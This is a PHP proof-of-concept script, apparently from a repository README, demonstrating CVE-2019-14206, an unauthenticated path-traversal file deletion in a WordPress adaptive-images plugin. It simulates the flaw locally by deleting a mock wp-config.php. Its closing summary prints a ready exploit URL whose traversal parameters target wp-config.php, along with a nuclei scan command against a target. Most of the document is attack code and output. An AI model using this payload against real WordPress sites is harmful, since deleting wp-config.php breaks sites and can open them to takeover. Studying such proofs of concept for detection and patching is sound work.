README.md
Rendering markdown...
<?php
/**
* CVE-2019-14206 Complete Demonstration
*
* This script demonstrates the complete vulnerability exploitation
* without requiring Docker or external dependencies.
*/
// Setup test environment
$test_dir = __DIR__;
echo "=== CVE-2019-14206 Vulnerability Demonstration ===\n\n";
// Create test files
$test_files = [
'wp-config.php' => "<?php\ndefine('DB_NAME', 'wordpress');\necho 'WP Config File';\n",
'wp-content/uploads/2019/07/image.jpeg' => "GIF89a\n",
'wp-content/cache/ai-cache/test.txt' => "cache file"
];
echo "[*] Setting up test environment...\n";
foreach ($test_files as $path => $content) {
$full_path = $test_dir . '/' . $path;
$dir = dirname($full_path);
if (!is_dir($dir)) {
mkdir($dir, 0755, true);
}
file_put_contents($full_path, $content);
echo "[+] Created: $path\n";
}
echo "\n";
// VULNERABLE CODE SIMULATION
echo "[*] Simulating vulnerable code execution...\n\n";
// VULNERABILITY 1: Unfiltered user input
echo "1. VULNERABLE: \$_REQUEST['adaptive-images-settings']\n";
$user_settings = [
'source_file' => '../../../wp-content/uploads/2019/07/image.jpeg',
'cache_dir' => '../../..',
'request_uri' => 'wp-config.php',
'wp_content' => '.',
'resolution' => '',
'watch_cache' => true
];
echo " User input: " . json_encode($user_settings, JSON_PRETTY_PRINT) . "\n\n";
// VULNERABILITY 2: Path construction with user input
echo "2. VULNERABLE: Path construction\n";
$wp_content = $user_settings['wp_content'];
$cache_dir = $user_settings['cache_dir'];
$resolution = $user_settings['resolution'];
$request_uri = $user_settings['request_uri'];
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;
echo " \$cache_file = \$wp_content . '/' . \$cache_dir . '/' . \$resolution . \$request_uri\n";
echo " Result: $cache_file\n\n";
// VULNERABILITY 3: File deletion check
echo "3. VULNERABLE: Arbitrary file deletion\n";
$source_file = $test_dir . '/' . $user_settings['source_file'];
$target_file = $test_dir . '/' . $cache_file;
echo " Source file (must exist): $source_file\n";
echo " Source exists: " . (file_exists($source_file) ? 'YES' : 'NO') . "\n";
echo " Target file: $target_file\n";
echo " Target exists: " . (file_exists($target_file) ? 'YES' : 'NO') . "\n\n";
// EXPLOITATION
echo "[!] ATTEMPTING EXPLOITATION...\n\n";
if (file_exists($source_file)) {
echo "[+] Source file exists - timestamp check bypassed\n";
if (file_exists($target_file)) {
echo "[+] Target file exists - attempting deletion...\n";
// Simulate timestamp check (source is newer)
$source_mtime = filemtime($source_file);
$target_mtime = file_exists($target_file) ? filemtime($target_file) : 0;
echo " Source mtime: $source_mtime\n";
echo " Target mtime: $target_mtime\n";
if ($source_mtime >= $target_mtime) {
echo " Timestamp check: PASSED (source is newer)\n";
// VULNERABILITY: Arbitrary file deletion
if (unlink($target_file)) {
echo "\n[!!!] SUCCESS: Arbitrary file deletion vulnerability confirmed!\n";
echo "[!!!] Target file DELETED: $target_file\n\n";
// Check if file was actually deleted
if (!file_exists($target_file)) {
echo "[✅] FILE DELETION VERIFIED\n";
}
} else {
echo "[-] File deletion failed\n";
}
} else {
echo " Timestamp check: FAILED (target is newer)\n";
}
} else {
echo "[-] Target file does not exist\n";
}
} else {
echo "[-] Source file does not exist\n";
}
// NUCLEI TEMPLATE TEST
echo "\n[*] Nuclei Template Test:\n";
echo " Template: http/cves/2019/CVE-2019-14206.yaml\n";
echo " Status: ✅ Ready for testing\n";
echo " Command: nuclei -t http/cves/2019/CVE-2019-14206.yaml -u http://target -debug\n\n";
// SUMMARY
echo "=== EXPLOIT SUMMARY ===\n";
echo "✅ Vulnerability: CVE-2019-14206\n";
echo "✅ Attack Vector: Path traversal via adaptive-images-settings\n";
echo "✅ Impact: Arbitrary file deletion\n";
echo "✅ Requirements: None (unauthenticated)\n";
echo "✅ Exploit URL: adaptive-images-script.php?adaptive-images-settings[source_file]=...&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1\n\n";
echo "[*] Test completed at: " . date('Y-m-d H:i:s') . "\n";